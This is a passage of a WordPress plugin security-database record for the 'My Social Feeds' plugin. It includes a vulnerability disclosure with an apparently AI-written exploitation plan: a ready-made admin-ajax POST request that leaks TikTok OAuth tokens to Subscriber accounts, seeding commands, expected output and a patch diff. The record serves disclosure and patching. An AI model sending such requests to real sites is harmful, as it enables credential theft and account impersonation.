[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fs_Qv1dQNbzk9BhQ0AxZv9Wtw8yvljVz7b6AGFJR7WSw":3,"$fszSw8ShJSGX3YLc_w4Xa2BMciUgyNwtvgvqGy8RPsVQ":424,"$fUF1oThfABMRJoqCLJRxd9NYAoP9srqzMrn6MLrAAyeM":428},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":24,"download_link":25,"security_score":26,"vuln_count":27,"unpatched_count":13,"last_vuln_date":28,"fetched_at":29,"discovery_status":30,"vulnerabilities":31,"developer":67,"crawl_stats":37,"alternatives":76,"analysis":177,"fingerprints":398},"my-social-feeds","My Social Feeds – Social Feeds Embedder Plugin for WordPress","1.0.3","bPlugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fbplugins\u002F","\u003Cp>\u003Cstrong>My Social Feeds\u003C\u002Fstrong> is a powerful Gutenberg block plugin that lets you embed social media feeds on your WordPress website. You can display Instagram posts, TikTok videos, Pinterest pins, and Twitter timelines with full control over layout, design, and behavior.\u003C\u002Fp>\n\u003Cp>Simply add your social access token where required, customize the layout, and you’re ready to go.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fbplugins.com\u002Fproducts\u002Fsocial-feed-block\u002F#demos\" rel=\"nofollow ugc\">Demos\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fbplugins.com\u002Fproducts\u002Fmy-social-feeds\u002F#pricing\" rel=\"nofollow ugc\">Get Pro Version\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=9zLjvdAV60A\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F9zLjvdAV60A?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Ch3>Instagram Feed\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Cache time configuration.\u003C\u002Fli>\n\u003Cli>Control number of displayed items.\u003C\u002Fli>\n\u003Cli>Column, row gap, and column gap settings.\u003C\u002Fli>\n\u003Cli>Open gallery item links.\u003C\u002Fli>\n\u003Cli>Open links in a new tab.\u003C\u002Fli>\n\u003Cli>Show\u002FHide profile.\u003C\u002Fli>\n\u003Cli>Adjustable profile image size.\u003C\u002Fli>\n\u003Cli>Show\u002FHide Load More, Caption, and Follow buttons.\u003C\u002Fli>\n\u003Cli>Background color control.\u003C\u002Fli>\n\u003Cli>Border and padding settings.\u003C\u002Fli>\n\u003Cli>Image effects: rotate in, rotate out, shine, zoom in, zoom out.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>New Free Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Three new Gutenberg blocks added\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>TikTok Feed (Free)\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Authorization, remove authorization, and cache clear options.\u003C\u002Fli>\n\u003Cli>Show TikTok profile and feeds.\u003C\u002Fli>\n\u003Cli>Feed-only display option.\u003C\u002Fli>\n\u003Cli>Device-based feed per page control.\u003C\u002Fli>\n\u003Cli>Show\u002FHide profile elements:\n\u003Cul>\n\u003Cli>Profile image\u003C\u002Fli>\n\u003Cli>Profile name\u003C\u002Fli>\n\u003Cli>Share button\u003C\u002Fli>\n\u003Cli>Info count\u003C\u002Fli>\n\u003Cli>Biography\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Profile alignment, color, background, and padding.\u003C\u002Fli>\n\u003Cli>Share button padding, color, and hover color.\u003C\u002Fli>\n\u003Cli>Video layout column control.\u003C\u002Fli>\n\u003Cli>Column gap and row gap options.\u003C\u002Fli>\n\u003Cli>Video popup with slider and thumbnail.\u003C\u002Fli>\n\u003Cli>Load more button color and hover color.\u003C\u002Fli>\n\u003Cli>Default load: 9 videos.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Pinterest Pins (Free)\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Show\u002FHide Profile, Pins, Image, Name, About, Follower Count, Pin Count, Follow Button\u003C\u002Fli>\n\u003Cli>Aspect ratio selection: 16:9, 4:3, 1:1, 3:4, 9:16\u003C\u002Fli>\n\u003Cli>Portrait ratio support (9:16)\u003C\u002Fli>\n\u003Cli>Adjustable columns with slider and manual input\u003C\u002Fli>\n\u003Cli>Column and row gap control\u003C\u002Fli>\n\u003Cli>Responsive layout controls\u003C\u002Fli>\n\u003Cli>Lightbox enable\u002Fdisable\u003C\u002Fli>\n\u003Cli>Lightbox controls: Info Bar, Zoom In, Zoom Out, Slide Show, Thumbs, Close (show\u002Fhide)\u003C\u002Fli>\n\u003Cli>Profile background, image overlay, overlay color, transform, and border settings\u003C\u002Fli>\n\u003Cli>Name, About, Count typography and color settings\u003C\u002Fli>\n\u003Cli>Button typography, colors, hover colors, padding, and border setting\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Twitter (Free)\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Add Twitter Timeline\u003C\u002Fli>\n\u003Cli>Timeline style options: height, width, scrolling, theme\u003C\u002Fli>\n\u003Cli>Add Twitter Follow Button\u003C\u002Fli>\n\u003Cli>Add Tweet Button\u003C\u002Fli>\n\u003Cli>Follow button styling: color, background, font size, padding\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Pro Features\u003C\u002Fh3>\n\u003Ch3>Instagram Feed\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Show feed details in popup modal\u003C\u002Fli>\n\u003Cli>Show Name and Biography in profile area\u003C\u002Fli>\n\u003Cli>Follow button in footer area\u003C\u002Fli>\n\u003Cli>Different profile photo size in popup\u003C\u002Fli>\n\u003Cli>Remove caption hashtags\u003C\u002Fli>\n\u003Cli>Username, name, biography color control\u003C\u002Fli>\n\u003Cli>Follow button color settings\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>TikTok (Pro)\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Show\u002FHide videos and content.\u003C\u002Fli>\n\u003Cli>Videos per page control.\u003C\u002Fli>\n\u003Cli>Video overlay like, share, view count show\u002Fhide.\u003C\u002Fli>\n\u003Cli>Overlay icon color control.\u003C\u002Fli>\n\u003Cli>Load more button text change.\u003C\u002Fli>\n\u003Cli>Cache time control.\u003C\u002Fli>\n\u003Cli>Profile layout selection.\u003C\u002Fli>\n\u003Cli>Profile name typography and color.\u003C\u002Fli>\n\u003Cli>Share button text and typography.\u003C\u002Fli>\n\u003Cli>Info count and text color control.\u003C\u002Fli>\n\u003Cli>Lightbox video show option.\u003C\u002Fli>\n\u003Cli>“View on TikTok” button show\u002Fhide.\u003C\u002Fli>\n\u003Cli>Modal content show\u002Fhide.\u003C\u002Fli>\n\u003Cli>Layout types: Default, Slider, Masonry.\u003C\u002Fli>\n\u003Cli>Image ratio selection.\u003C\u002Fli>\n\u003Cli>Gallery background and overlay color.\u003C\u002Fli>\n\u003Cli>Content icon size control.\u003C\u002Fli>\n\u003Cli>Button typography, colors, padding.\u003C\u002Fli>\n\u003Cli>Pattern support.\u003C\u002Fli>\n\u003Cli>Masonry layout video info show\u002Fhide.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Pinterest Pins (Pro)\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Show\u002FHide pins.\u003C\u002Fli>\n\u003Cli>Layouts: Default, Masonry, Slider, Justified.\u003C\u002Fli>\n\u003Cli>Image ratio control.\u003C\u002Fli>\n\u003Cli>Popup control show\u002Fhide (Zoom, Toggle, etc.).\u003C\u002Fli>\n\u003Cli>Image overlay, transform, and overlay color.\u003C\u002Fli>\n\u003Cli>Typography control for Name, About, Count, Button.\u003C\u002Fli>\n\u003Cli>Lightbox controls: Toggle 1:1, Rotate CCW, Rotate CW, Flip X, Flip Y (show\u002Fhide).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Twitter (Pro)\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Hide timeline header and footer.\u003C\u002Fli>\n\u003Cli>Timeline language translation.\u003C\u002Fli>\n\u003Cli>Latest Twitter icon support.\u003C\u002Fli>\n\u003Cli>Tweet button with custom text.\u003C\u002Fli>\n\u003Cli>Hashtag support.\u003C\u002Fli>\n\u003Cli>Embed videos from specific tweets.\u003C\u002Fli>\n\u003Cli>Embed specific Twitter posts.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>How to Use\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Install the \u003Cstrong>My Social Feeds\u003C\u002Fstrong> plugin\u003C\u002Fli>\n\u003Cli>Add the \u003Cstrong>My Social Feeds\u003C\u002Fstrong> block from the “Widgets” category in Gutenberg\u003C\u002Fli>\n\u003Cli>Customize settings from the right sidebar\u003C\u002Fli>\n\u003Cli>Enjoy!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Feedback\u003C\u002Fh3>\n\u003Cp>Did you like this plugin or have suggestions?\u003Cbr \u002F>\n\u003Ca href=\"mailto:support@bplugins.com\" rel=\"nofollow ugc\">Send feedback\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Check Out Our Plugins\u003C\u002Fh3>\n\u003Cp>🔥 \u003Cstrong>b Blocks\u003C\u002Fstrong> – https:\u002F\u002Fbblockswp.com\u003Cbr \u002F>\n🔥 \u003Cstrong>HTML5 Audio Player\u003C\u002Fstrong> – https:\u002F\u002Fbplugins.com\u002Fproducts\u002Fhtml5-audio-player\u003Cbr \u002F>\n🔥 \u003Cstrong>HTML5 Video Player\u003C\u002Fstrong> – https:\u002F\u002Fbplugins.com\u002Fproducts\u002Fhtml5-video-player\u003Cbr \u002F>\n🔥 \u003Cstrong>PDF Poster\u003C\u002Fstrong> – https:\u002F\u002Fbplugins.com\u002Fproducts\u002Fpdf-poster\u003Cbr \u002F>\n🔥 \u003Cstrong>StreamCast\u003C\u002Fstrong> – https:\u002F\u002Fbplugins.com\u002Fproducts\u002Fstreamcast-radio-player\u003Cbr \u002F>\n🔥 \u003Cstrong>3D Viewer\u003C\u002Fstrong> – https:\u002F\u002Fbplugins.com\u002Fproducts\u002F3d-viewer\u003C\u002Fp>\n","Embed Instagram, TikTok, Pinterest, and Twitter feeds easily using Gutenberg blocks.",300,2035,0,"2026-04-11T11:37:00.000Z","6.9.4","6.5","7.1",[19,20,21,22,23],"block","instagram-feed","pinterest-feed","tiktok-feed","twitter-feed","","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.3.zip",99,1,"2026-05-01 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[32],{"id":33,"url_slug":34,"title":35,"description":36,"plugin_slug":4,"theme_slug":37,"affected_versions":38,"patched_in_version":39,"severity":40,"cvss_score":41,"cvss_vector":42,"vuln_type":43,"published_date":28,"updated_date":44,"references":45,"days_to_patch":27,"patch_diff_files":47,"patch_trac_url":37,"research_status":56,"research_verified":57,"research_rounds_completed":58,"research_plan":59,"research_summary":60,"research_vulnerable_code":61,"research_fix_diff":62,"research_exploit_outline":63,"research_model_used":64,"research_started_at":65,"research_completed_at":66,"research_error":37,"poc_status":37,"poc_video_id":37,"poc_summary":37,"poc_steps":37,"poc_tested_at":37,"poc_wp_version":37,"poc_php_version":37,"poc_playwright_script":37,"poc_exploit_code":37,"poc_has_trace":57,"poc_model_used":37,"poc_verification_depth":37},"CVE-2026-6446","my-social-feeds-missing-authorization-to-unauthenticated-sensitive-information-exposure-via-ttpgetaccounts-ajax-action","My Social Feeds \u003C= 1.0.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'ttp_get_accounts' AJAX Action","The My Social Feeds – Social Feeds Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 1.0.4 via the 'ttp_get_accounts' AJAX action. This is due to the complete absence of authorization checks (no capability verification) and nonce verification in the get_accounts() function, which returns the full contents of the 'ttp_tiktok_accounts' WordPress option. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive TikTok OAuth credentials, including access_token and refresh_token values, that belong to administrator-connected TikTok accounts, enabling them to impersonate the site owner when interacting with the TikTok API.",null,"\u003C=1.0.4","1.0.5","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Insufficiently Protected Credentials","2026-05-02 04:27:46",[46],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd46d6493-8b89-4258-9d83-79e5946cd76f?source=api-prod",[48,49,50,51,52,53,54,55],"build\u002Fadmin-dashboard.asset.php","build\u002Fadmin-dashboard.js","build\u002Ftiktok-player\u002Findex.asset.php","build\u002Ftiktok-player\u002Findex.js","build\u002Ftiktok-player\u002Fview.asset.php","build\u002Ftiktok-player\u002Fview.js","includes\u002FTiktokAPI.php","languages\u002Fmy-social-feeds-en_US.po","researched",false,3,"# Exploitation Research Plan - CVE-2026-6446\n\n## 1. Vulnerability Summary\nThe **My Social Feeds** plugin (up to version 1.0.4) contains a sensitive information exposure vulnerability via its AJAX handler for the `ttp_get_accounts` action. The `get_accounts()` function in the `TTPTiktokAPI` class lacks both capability checks (`current_user_can`) and nonce verification (`check_ajax_referer`). This allows any authenticated user, including those with **Subscriber** privileges, to retrieve the full contents of the `ttp_tiktok_accounts` WordPress option, which contains TikTok OAuth credentials (`access_token`, `refresh_token`, and `open_id`).\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `ttp_get_accounts`\n- **HTTP Method**: `POST` or `GET` (AJAX actions typically support both, but `POST` is standard).\n- **Authentication**: Required (Subscriber level or higher).\n- **Vulnerable Parameter**: None (the action itself triggers the data dump).\n- **Payload**: `action=ttp_get_accounts`\n\n## 3. Code Flow\n1. **Entry Point**: The plugin registers the AJAX action in `includes\u002FTiktokAPI.php`:\n   ```php\n   add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);\n   ```\n   *Note: There is no corresponding `wp_ajax_nopriv_ttp_get_accounts`, confirming authentication is required.*\n2. **Sink**: The `get_accounts()` function (located in `includes\u002FTiktokAPI.php` at approximately line 156) is called.\n3. **Execution**: In the vulnerable version (1.0.4), the function likely reads the option and returns it directly:\n   ```php\n   public function get_accounts() {\n       \u002F\u002F Vulnerable version lacks: if (!current_user_can('manage_options')) return;\n       \u002F\u002F Vulnerable version lacks: check_ajax_referer('...', '...');\n       $accounts = get_option('ttp_tiktok_accounts', []);\n       wp_send_json_success($accounts);\n   }\n   ```\n4. **Data Leak**: The `ttp_tiktok_accounts` option stores an associative array where keys are TikTok `open_id`s and values include `access_token` and `refresh_token`.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `get_accounts()` function **completely lacks nonce verification**. Therefore, no nonce is required to exploit this endpoint. \n\nIf testing reveals a nonce is required (i.e., the description was inaccurate), the nonce would typically be generated in `build\u002Fadmin-dashboard.js` and localized. However, based on the `PR:L` severity and the \"Missing Authorization\" description, the exploit should succeed with just a valid Subscriber session.\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan:\n1. **Authentication**: Log in as a Subscriber-level user to obtain a session cookie.\n2. **Execution**: Send a `POST` request to `admin-ajax.php` with the `action` parameter set to `ttp_get_accounts`.\n3. **Capture**: Parse the JSON response to extract TikTok credentials.\n\n### Required HTTP Request:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Subscriber Cookies]\n\naction=ttp_get_accounts\n```\n\n## 6. Test Data Setup\nTo verify the leak, mock data must exist in the database. Use WP-CLI to seed the sensitive option:\n\n```bash\n# Seed the TikTok accounts option with dummy sensitive data\nwp option update ttp_tiktok_accounts '{\n    \"test_open_id_123\": {\n        \"account_id\": \"test_open_id_123\",\n        \"display_name\": \"Attacker Target\",\n        \"access_token\": \"SENSITIVE_ACCESS_TOKEN_XYZ_999\",\n        \"refresh_token\": \"SENSITIVE_REFRESH_TOKEN_ABC_111\",\n        \"expires_at\": 1999999999\n    }\n}' --format=json\n```\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON body:\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"test_open_id_123\": {\n            \"account_id\": \"test_open_id_123\",\n            \"display_name\": \"Attacker Target\",\n            \"access_token\": \"SENSITIVE_ACCESS_TOKEN_XYZ_999\",\n            \"refresh_token\": \"SENSITIVE_REFRESH_TOKEN_ABC_111\",\n            \"expires_at\": 1999999999\n        }\n    }\n}\n```\n\n## 8. Verification Steps\n1. **Observe Output**: Verify the returned JSON contains the `access_token` and `refresh_token` seeded in Step 6.\n2. **Access Control Check**: Attempt the same request without a cookie to ensure `wp_ajax_` correctly blocks unauthenticated requests (returning `400` or `0`).\n3. **Privilege Check**: Confirm the user used for exploitation has only the `subscriber` role:\n   ```bash\n   wp user get \u003Cusername> --field=roles\n   ```\n\n## 9. Alternative Approaches\nIf the `ttp_get_accounts` endpoint is somehow blocked, examine `ttp_tiktok_videos` (registered for `nopriv`):\n```php\nadd_action('wp_ajax_ttp_tiktok_videos', [$this, 'get_videos']);\nadd_action('wp_ajax_nopriv_ttp_tiktok_videos', [$this, 'get_videos']);\n```\nCheck if `get_videos` leaks the account info in its response or through error messages if an invalid `open_id` is provided. However, `get_accounts` is the primary and direct target for this CVE.","The My Social Feeds plugin for WordPress is vulnerable to sensitive information exposure due to a missing authorization check on its 'ttp_get_accounts' AJAX action. Authenticated attackers, including those with Subscriber-level privileges, can exploit this to retrieve sensitive TikTok OAuth tokens (access and refresh tokens) stored in the WordPress options table.","\u002F\u002F includes\u002FTiktokAPI.php\n\n\u002F\u002F Line 25\nadd_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);\n\n\u002F\u002F ...\n\n\u002F\u002F Line 156\npublic function get_accounts() {\n    $accounts = get_option('ttp_tiktok_accounts', []);\n    wp_send_json_success($accounts);\n}","--- includes\u002FTiktokAPI.php\n+++ includes\u002FTiktokAPI.php\n@@ -156,5 +156,8 @@\n \n     public function get_accounts() {\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+            wp_send_json_error( 'Unauthorized' );\n+        }\n         $accounts = get_option('ttp_tiktok_accounts', []);\n         wp_send_json_success($accounts);\n     }","To exploit this vulnerability, an attacker needs a valid login session on the WordPress site (Subscriber level or higher). The attacker sends a request to the \u002Fwp-admin\u002Fadmin-ajax.php endpoint with the action parameter set to 'ttp_get_accounts'. Because the plugin fails to verify user capabilities or nonces for this action, it returns the full contents of the 'ttp_tiktok_accounts' option, which includes sensitive TikTok OAuth credentials (access_token, refresh_token, and open_id) belonging to the site administrator.","gemini-3-flash-preview","2026-05-04 17:37:06","2026-05-04 17:37:37",{"slug":68,"display_name":69,"profile_url":8,"plugin_count":70,"total_installs":71,"avg_security_score":72,"avg_patch_time_days":73,"trust_score":74,"computed_at":75},"bplugins","colorlibplugins",121,740460,98,130,78,"2026-05-20T07:03:23.227Z",[77,99,118,136,157],{"slug":78,"name":79,"version":80,"author":81,"author_profile":82,"description":83,"short_description":84,"active_installs":85,"downloaded":86,"rating":87,"num_ratings":88,"last_updated":89,"tested_up_to":15,"requires_at_least":90,"requires_php":17,"tags":91,"homepage":96,"download_link":97,"security_score":72,"vuln_count":58,"unpatched_count":13,"last_vuln_date":98,"fetched_at":29},"spotlight-social-photo-feeds","Spotlight Social Feeds – Block, Shortcode, and Widget","1.7.5","RebelCode","https:\u002F\u002Fprofiles.wordpress.org\u002Frebelcode\u002F","\u003Cp>\u003Cstrong>Embed \u003Ca href=\"https:\u002F\u002Fwww.instagram.com\u002F\" rel=\"nofollow ugc\">Instagram\u003C\u002Fa> feeds anywhere on your website.\u003C\u002Fstrong> Choose a beautifully designed template, connect your Instagram account, and customize unlimited galleries to display across your website.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fdemo\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_topdemos\" rel=\"nofollow ugc\">\u003Cstrong>Instagram Feed Demos\u003C\u002Fstrong>\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Finstagram-slider\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_topslider\" rel=\"nofollow ugc\">Instagram Slider Gallery\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Follow 3 simple steps…\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Select an Instagram feed design*\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdocs.spotlightwp.com\u002Fcategory\u002F517-connecting-accounts\" rel=\"nofollow ugc\">Connect\u003C\u002Fa> an Instagram account\u003C\u002Fli>\n\u003Cli>Display your Instagram feed on your website\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Create and embed multiple Instagram feeds using posts from as many Instagram accounts as you want.\u003C\u002Fp>\n\u003Cp>*Or create your own, it’s fully customizable.\u003C\u002Fp>\n\u003Ch3>Free Features\u003C\u002Fh3>\n\u003Cp>Get everything you need to display an Instagram feed for free. Every gallery blends in perfectly with your website, adapting to fit in perfectly with your theme’s design and fonts.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Connect \u003Cstrong>unlimited Instagram accounts\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Display \u003Cstrong>unlimited Instagram feeds\u003C\u002Fstrong> across your website\u003C\u002Fli>\n\u003Cli>Combine multiple Instagram accounts in a single feed\u003C\u002Fli>\n\u003Cli>Supports photos, videos, reels, and gallery posts\u003C\u002Fli>\n\u003Cli>Embed singular Instagram posts with our \u003Cstrong>Instagram oEmbed support\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Free pre-designed templates\u003C\u002Fstrong> (or design your own)\u003C\u002Fli>\n\u003Cli>20+ design customization options\u003C\u002Fli>\n\u003Cli>Set the \u003Cstrong>number of columns and posts\u003C\u002Fstrong> for each feed\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Order your Instagram posts\u003C\u002Fstrong> by date, popularity, or at random\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Customize the design per device\u003C\u002Fstrong> (responsive by default)\u003C\u002Fli>\n\u003Cli>Add a \u003Cstrong>popup lightbox\u003C\u002Fstrong> to show larger photos, reels, and videos\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom feed header\u003C\u002Fstrong> with your account’s avatar and bio\u003C\u002Fli>\n\u003Cli>Customize and translate the \u003Cstrong>“Follow” and “Load more” buttons\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Embed your Instagram feed using a block, shortcode, or widget\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Agencies and developers\u003C\u002Fstrong>: Ask clients to use the Spotlight \u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Faccess-token-generator\u002F\" rel=\"nofollow ugc\">Access Token Generator\u003C\u002Fa> instead of asking them for their private Instagram account login details. It’s safer and faster.\u003C\u002Fp>\n\u003Ch3>Why People Are Loving Spotlight\u003C\u002Fh3>\n\u003Cp>In just over two years, Spotlight has been downloaded over 400,000 times and is currently in use on 50,000+ websites around the world. These are the main reasons people keep coming back to it.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#1 Keep your website updated, automatically\u003C\u002Fstrong>\u003Cbr \u002F>\nGone are the days of manually updating your website’s gallery with new photos, videos, and reels every week. You have access to Instagram on the go, so simply post to the app and Spotlight will automatically update your website for you.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#2 Show people what you’re up to\u003C\u002Fstrong>\u003Cbr \u002F>\nInstagram is a great platform for building relationships with your followers. Share that same experience with your website visitors and show off your followers’ love for what you do.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#3 Create new connections\u003C\u002Fstrong>\u003Cbr \u002F>\nIncrease social engagement and grow your Instagram following with a “Follow on Instagram” button directly within your website’s Instagram feed.\u003C\u002Fp>\n\u003Ch3>“Finally, a social plugin that simply works” – Georgia G.\u003C\u002Fh3>\n\u003Cp>There are many Instagram plugins for WordPress, but we wanted to create something that simply worked. No fluff and no annoying ads, just what you really need.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#1 Professionally designed templates\u003C\u002Fstrong>\u003Cbr \u002F>\nOur designers took care of every detail to make your your Instagram galleries are ready to go from the moment you connect an Instagram account.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#2 Fully customizable and responsive\u003C\u002Fstrong>\u003Cbr \u002F>\nAll designs are fully responsive right out of the box. You can also create your own custom designs, creating different looks for every device type.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#3 Added SEO value for your website\u003C\u002Fstrong>\u003Cbr \u002F>\nYour Instagram posts have SEO value in themselves. Spotlight’s feeds are embedded directly on your website and crawled by search engines. The dynamic content and ALT tags (taken from the Instagram post captions) help boost your SEO. Spotlight also includes its own clever caching and image optimization to help with website performance.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>#4 Accessible right out of the box\u003C\u002Fstrong>\u003Cbr \u002F>\nSpotlight is accessible for users as well as website visitors. The entire interface as well as embedded Instagram feeds can be navigated using your keyboard and all images include ALT tags.\u003C\u002Fp>\n\u003Ch3>Fast and Helpful Support\u003C\u002Fh3>\n\u003Cp>We provide support for both the free and premium versions of Spotlight.\u003C\u002Fp>\n\u003Cp>We are constantly working on new innovative features to make your Instagram content work harder for your business. Whenever you have a question or want to request a new feature , we’re just a quick message away.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdocs.spotlightwp.com\u002F\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fspotlight-social-photo-feeds\u002F\" rel=\"ugc\">Free support (forum)\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fsupport\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_support\" rel=\"nofollow ugc\">Premium & pre-sales support (email)\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Spotlight’s Premium Upgrades\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fpricing\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_upgrade\" rel=\"nofollow ugc\">Spotlight offers premium plans\u003C\u002Fa> with additional customization options and features for those looking to get more value from their Instagram content.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fpricing\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_essentials\" rel=\"nofollow ugc\">Spotlight Essentials\u003C\u002Fa>\u003C\u002Fstrong>\u003Cbr \u002F>\n– Everything in Free plus…\u003Cbr \u002F>\n– Unlock all templates and layouts\u003Cbr \u002F>\n– Unlock all customisation options\u003Cbr \u002F>\n– Show Instagram stories (just like in the app)\u003Cbr \u002F>\n– Elementor integration (a dedicated Spotlight widget)\u003C\u002Fp>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Fpricing\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_pro\" rel=\"nofollow ugc\">Spotlight PRO\u003C\u002Fa>\u003C\u002Fstrong>\u003Cbr \u002F>\n– Everything in Free and Essentials plus…\u003Cbr \u002F>\n– Display public \u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Finstagram-hashtag-feeds\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_upgradehashtag\" rel=\"nofollow ugc\">\u003Cstrong>Instagram hashtag feeds\u003C\u002Fstrong>\u003C\u002Fa>\u003Cbr \u002F>\n– Display \u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Ftagged-post-feeds\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_upgradetagged\" rel=\"nofollow ugc\">\u003Cstrong>tagged Instagram posts\u003C\u002Fstrong>\u003C\u002Fa>\u003Cbr \u002F>\n– Create combined feeds with multiple source types (account, hashtag, tagged)\u003Cbr \u002F>\n– Filter your Instagram feed by keywords or phrases in captions\u003Cbr \u002F>\n– Filter your Instagram feed by hashtags\u003Cbr \u002F>\n– Moderate your feed by hand-selecting the posts to show or hide\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fspotlightwp.com\u002Flink-in-bio\u002F?utm_source=readme&utm_medium=readme_desc&utm_campaign=readme_desc_upgradelinkinbio\" rel=\"nofollow ugc\">\u003Cstrong>Instagram link in bio\u003C\u002Fstrong>\u003C\u002Fa> pages to drive traffic from 